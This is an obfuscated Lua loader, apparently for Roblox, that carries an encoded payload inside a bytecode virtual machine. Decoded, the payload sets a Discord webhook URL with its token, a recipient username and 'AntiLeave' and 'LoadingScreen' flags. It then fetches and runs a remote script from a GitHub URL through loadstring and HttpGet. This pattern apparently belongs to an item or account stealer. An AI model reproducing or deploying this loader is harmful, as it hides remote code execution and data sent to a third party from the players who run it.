--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.14) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v69=0;while true do if (v69==0) then v19=v0(v3(v30,1,1));return "";end end else local v70=v2(v0(v30,16));if v19 then local v77=v5(v70,v19);v19=nil;return v77;else return v70;end end end);local function v20(v31,v32,v33)if v33 then local v71=(v31/((5 -3)^(v32-((1067 -(68 + 997)) -1))))%((3 -1)^(((v33-(2 -(1271 -(226 + 1044)))) -(v32-((2699 -2079) -(555 + (181 -(32 + 85)))))) + (932 -(857 + 74)))) ;return v71-(v71%(569 -(367 + 201))) ;else local v72=927 -(214 + 713) ;local v73;while true do if (v72==(0 + 0 + 0)) then v73=2^(v32-(1 + 0)) ;return (((v31%(v73 + v73))>=v73) and (878 -((401 -119) + 595))) or (1637 -(1523 + 114)) ;end end end end local function v21()local v34=0 + 0 ;local v35;while true do if (v34==1) then return v35;end if (v34==0) then v35=v1(v16,v18,v18);v18=v18 + 1 + (0 -0) ;v34=958 -(892 + 65) ;end end end local function v22()local v36=0 -0 ;local v37;local v38;while true do if (v36==0) then v37,v38=v1(v16,v18,v18 + (3 -1) );v18=v18 + (352 -(87 + 263)) ;v36=181 -(67 + 113) ;end if (v36==(1 + 0 + 0)) then return (v38 * (628 -372)) + v37 ;end end end local function v23()local v39=997 -(915 + 82) ;local v40;local v41;local v42;local v43;while true do if (v39==(0 -0)) then v40,v41,v42,v43=v1(v16,v18,v18 + 2 + 1 );v18=v18 + (956 -(802 + 150)) ;v39=(2110 -922) -(1069 + 118 + 0) ;end if (v39==(2 -(792 -(368 + 423)))) then return (v43 * (36699709 -19922493)) + (v42 * ((373598 -254719) -53343)) + (v41 * (187 + 69)) + v40 ;end end end local function v24()local v44=v23();local v45=v23();local v46=19 -(10 + 8) ;local v47=(v20(v45,3 -2 ,462 -(416 + 26) ) * ((6 -4)^((899 -(261 + 624)) + 18))) + v44 ;local v48=v20(v45,36 -15 ,469 -(145 + 293) );local v49=((v20(v45,462 -(44 + 386) )==(1487 -((1773 -775) + 488))) and  -((1081 -(1020 + 60)) + 0)) or (1 + (0 -0)) ;if (v48==(772 -(201 + (2703 -2132)))) then if (v47==(1138 -(116 + 1022))) then return v49 * (0 -0) ;else local v78=0;while true do if (0==v78) then v48=1 + 0 ;v46=0;break;end end end elseif (v48==2047) then return ((v47==(0 -(0 + 0))) and (v49 * ((3 -2)/(859 -(814 + 45))))) or (v49 * NaN) ;end return v8(v49,v48-(2520 -1497) ) * (v46 + (v47/((1 + (1424 -(630 + 793)))^(19 + (113 -80))))) ;end local function v25(v50)local v51=1747 -(760 + (2042 -(87 + 968))) ;local v52;local v53;while true do if ((1915 -(1789 + 124))==v51) then v53={};for v79=767 -(745 + 21) , #v52 do v53[v79]=v2(v1(v3(v52,v79,v79)));end v51=2 + 1 ;end if (v51==1) then v52=v3(v16,v18,(v18 + v50) -1 );v18=v18 + v50 ;v51=(22 -17) -3 ;end if (v51==(11 -8)) then return v6(v53);end if (v51==0) then v52=nil;if  not v50 then v50=v23();if (v50==(0 + 0)) then return "";end end v51=1 + 0 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v54=0;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v54==(11 -8)) then v61=nil;while true do local v81=1824 -(1195 + 629) ;local v82;while true do if ((0 + 0)~=v81) then else v82=0 -0 ;while true do if (v82~=1) then else if (v55~=(0 -0)) then else v56={};v57={};v58={};v55=66 -(30 + 35) ;end if (v55==(1 + 0)) then v59={v56,v57,nil,v58};v60=v23();v61={};v55=582 -(361 + 219) ;end break;end if (v82==(780 -(162 + 618))) then local v105=0;while true do if (1==v105) then v82=1 + 0 ;break;end if (v105==0) then if (v55~=(2 + 0)) then else for v109=1 + 0 ,v60 do local v110=0;local v111;local v112;local v113;local v114;while true do if (v110==(1 -0)) then v113=nil;v114=nil;v110=2;end if (v110==(2 -0)) then while true do if (v111~=1) then else v114=nil;while true do if (v112==(0 + 0)) then v113=v21();v114=nil;v112=983 -(18 + 964) ;end if (v112==1) then if (v113==1) then v114=v21()~=(1636 -(1373 + 263)) ;elseif (v113==(1002 -(451 + 549))) then v114=v24();elseif (v113==3) then v114=v25();end v61[v109]=v114;break;end end break;end if (v111~=(0 + 0)) then else local v173=0 + 0 ;while true do if (v173~=(0 + 0)) then else v112=0;v113=nil;v173=1 -0 ;end if (v173~=1) then else v111=1;break;end end end end break;end if (v110==(0 -0)) then v111=1384 -(746 + 638) ;v112=nil;v110=127 -(116 + 10) ;end end end v59[2 + 1 ]=v21();for v115=739 -(542 + 196) ,v23() do local v116=0;local v117;local v118;local v119;while true do if (v116==0) then local v162=0 -0 ;while true do if (v162==(1 -0)) then v116=1;break;end if (v162~=(0 + 0)) then else v117=0;v118=nil;v162=1;end end end if (v116~=(1 + 0)) then else v119=nil;while true do if (v117==(0 -0)) then local v174=0;while true do if (v174~=(342 -(218 + 123))) then else v117=1;break;end if (v174==(1551 -(1126 + 425))) then local v180=1581 -(1535 + 46) ;while true do if (v180~=(1 + 0)) then else v174=406 -(118 + 287) ;break;end if (v180==(0 -0)) then v118=0;v119=nil;v180=1122 -(118 + 1003) ;end end end end end if (v117==(1 + 0)) then while true do if (v118==(560 -(306 + 254))) then v119=v21();if (v20(v119,1,1 + 0 )==(0 -0)) then local v181=0 -0 ;local v182;local v183;local v184;local v185;while true do if ((1467 -(899 + 568))==v181) then v182=0 + 0 ;v183=nil;v181=2 -1 ;end if (v181~=(605 -(268 + 335))) then else while true do if (v182==(292 -(60 + 230))) then local v186=572 -(426 + 146) ;local v187;while true do if (v186~=(0 + 0)) then else v187=1456 -(282 + 1174) ;while true do if (v187==(811 -(569 + 242))) then if (v20(v184,1,2 -1 )~=(1 + 0)) then else v185[1 + 1 ]=v61[v185[1026 -(706 + 318) ]];end if (v20(v184,1253 -(721 + 530) ,2 + 0 )==(1 + 0)) then v185[1274 -(945 + 326) ]=v61[v185[7 -4 ]];end v187=1;end if (v187~=(1 + 0)) then else v182=3;break;end end break;end end end if (v182~=(701 -(271 + 429))) then else local v188=0;while true do if (v188~=(2 -1)) then else v182=4 -2 ;break;end if (v188==(0 + 0)) then local v194=0 -0 ;while true do if ((1 + 0)==v194) then v188=1501 -(1408 + 92) ;break;end if (v194==(0 + 0)) then v185={v22(),v22(),nil,nil};if (v183==(0 + 0)) then local v199=1171 -(418 + 753) ;while true do if (v199==(0 -0)) then v185[1205 -(373 + 829) ]=v22();v185[2 + 2 ]=v22();break;end end elseif (v183==(1131 -(369 + 761))) then v185[1 + 2 ]=v23();elseif (v183==2) then v185[2 + 1 ]=v23() -((1 + 1)^(5 + 11)) ;elseif (v183~=(532 -(406 + 123))) then else local v204=1769 -(1749 + 20) ;local v205;local v206;while true do if (v204==0) then v205=0 + 0 ;v206=nil;v204=239 -(64 + 174) ;end if (v204==(1323 -(1249 + 73))) then while true do if (v205~=(0 -0)) then else v206=0 + 0 ;while true do if (v206==(1145 -(466 + 679))) then v185[3]=v23() -((218 -(42 + 174))^(38 -22)) ;v185[4]=v22();break;end end break;end end break;end end end v194=1 + 0 ;end end end end end if (v182==(8 -5)) then if (v20(v184,1507 -(363 + 1141) ,1903 -(106 + 1794) )==1) then v185[11 -7 ]=v61[v185[2 + 2 ]];end v56[v115]=v185;break;end if (v182==(0 + 0)) then local v190=0;local v191;while true do if ((0 -0)==v190) then v191=0 + 0 ;while true do if (v191~=(0 -0)) then else v183=v20(v119,2,3);v184=v20(v119,10 -6 ,120 -(4 + 110) );v191=1;end if ((585 -(57 + 527))==v191) then v182=1;break;end end break;end end end end break;end if (v181==(3 -2)) then v184=nil;v185=nil;v181=1663 -(1477 + 184) ;end end end break;end end break;end end break;end end end v55=3 -0 ;end if (v55==(1430 -(41 + 1386))) then local v107=0;local v108;while true do if (0==v107) then v108=103 -(17 + 86) ;while true do if (v108~=(0 + 0)) then else for v175=1 -0 ,v23() do v57[v175-(2 -1) ]=v28();end return v59;end end break;end end end v105=1;end end end end break;end end end break;end if (v54~=(166 -(122 + 44))) then else v55=0 -0 ;v56=nil;v54=3 -2 ;end if (v54~=(5 -3)) then else v59=nil;v60=nil;v54=3;end if (v54~=1) then else v57=nil;v58=nil;v54=306 -(244 + 60) ;end end end local function v29(v62,v63,v64)local v65=0;local v66;local v67;local v68;while true do if (v65==0) then v66=v62[1];v67=v62[2];v65=1;end if (v65==1) then v68=v62[3];return function(...)local v83=v66;local v84=v67;local v85=v68;local v86=v27;local v87=1;local v88= -1;local v89={};local v90={...};local v91=v12("#",...) -1 ;local v92={};local v93={};for v97=0,v91 do if (v97>=v85) then v89[v97-v85 ]=v90[v97 + 1 ];else v93[v97]=v90[v97 + 1 ];end end local v94=(v91-v85) + 1 ;local v95;local v96;while true do local v98=0;while true do if (v98==0) then v95=v83[v87];v96=v95[1];v98=1;end if (v98==1) then if (v96<=9) then if (v96<=4) then if (v96<=1) then if (v96==0) then v93[v95[2]]();else v93[v95[2]][v95[3]]=v95[4];end elseif (v96<=2) then v93[v95[2]]=v95[3];elseif (v96==3) then local v151=0;local v152;local v153;while true do if (v151==1) then v93[v152 + 1 ]=v153;v93[v152]=v153[v95[4]];break;end if (v151==0) then v152=v95[2];v153=v93[v95[3]];v151=1;end end else v64[v95[3]]=v93[v95[2]];end elseif (v96<=6) then if (v96>5) then local v124=0;local v125;local v126;local v127;local v128;while true do if (v124==1) then v88=(v127 + v125) -1 ;v128=0;v124=2;end if (v124==0) then v125=v95[2];v126,v127=v86(v93[v125](v13(v93,v125 + 1 ,v95[3])));v124=1;end if (v124==2) then for v164=v125,v88 do local v165=0;while true do if (v165==0) then v128=v128 + 1 ;v93[v164]=v126[v128];break;end end end break;end end else local v129=v95[2];v93[v129]=v93[v129](v13(v93,v129 + 1 ,v88));end elseif (v96<=7) then v93[v95[2]][v95[3]]=v95[4];elseif (v96>8) then do return;end else local v156=0;local v157;while true do if (v156==0) then v157=v95[2];v93[v157]=v93[v157](v13(v93,v157 + 1 ,v88));break;end end end elseif (v96<=14) then if (v96<=11) then if (v96==10) then v64[v95[3]]=v93[v95[2]];else v93[v95[2]]=v95[3];end elseif (v96<=12) then local v137=v95[2];local v138,v139=v86(v93[v137](v13(v93,v137 + 1 ,v95[3])));v88=(v139 + v137) -1 ;local v140=0;for v148=v137,v88 do v140=v140 + 1 ;v93[v148]=v138[v140];end elseif (v96>13) then do return;end else v93[v95[2]]=v64[v95[3]];end elseif (v96<=16) then if (v96>15) then v93[v95[2]]();else local v141=v95[2];local v142=v93[v95[3]];v93[v141 + 1 ]=v142;v93[v141]=v142[v95[4]];end elseif (v96<=17) then v93[v95[2]]=v64[v95[3]];elseif (v96==18) then v93[v95[2]]=v95[3]~=0 ;else v93[v95[2]]=v95[3]~=0 ;end v87=v87 + 1 ;break;end end end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0E3O0003083O00557365724E616D65030C3O006F6D8O672O6403073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3134303239383332373237313935323532342F7A4E37344F4D7A717534364568792O63774E512O48696B73447355625F525546524A5F52634C334E6156476F773830596749365465566A2D706D2O3831524264344E533203093O00557365724E616D653203023O005F47030D3O004C6F6164696E675363722O656E2O0103093O00416E74694C6561766503093O004D6F7573654C6F636B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403413O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C796E582O3536312F56616C68612O6C612F6D61696E2F56616C68612O6C6100153O00120B3O00023O00120A3O00013O00120B3O00043O00120A3O00033O00120B3O00023O00120A3O00053O00120D3O00063O0030013O0007000800120D3O00063O0030013O0009000800120D3O00063O0030013O000A000800120D3O000B3O00120D0001000C3O00200300010001000D00120B0003000E4O0013000400014O0006000100044O00055O00022O00103O000100012O00093O00017O00",v9(),...);
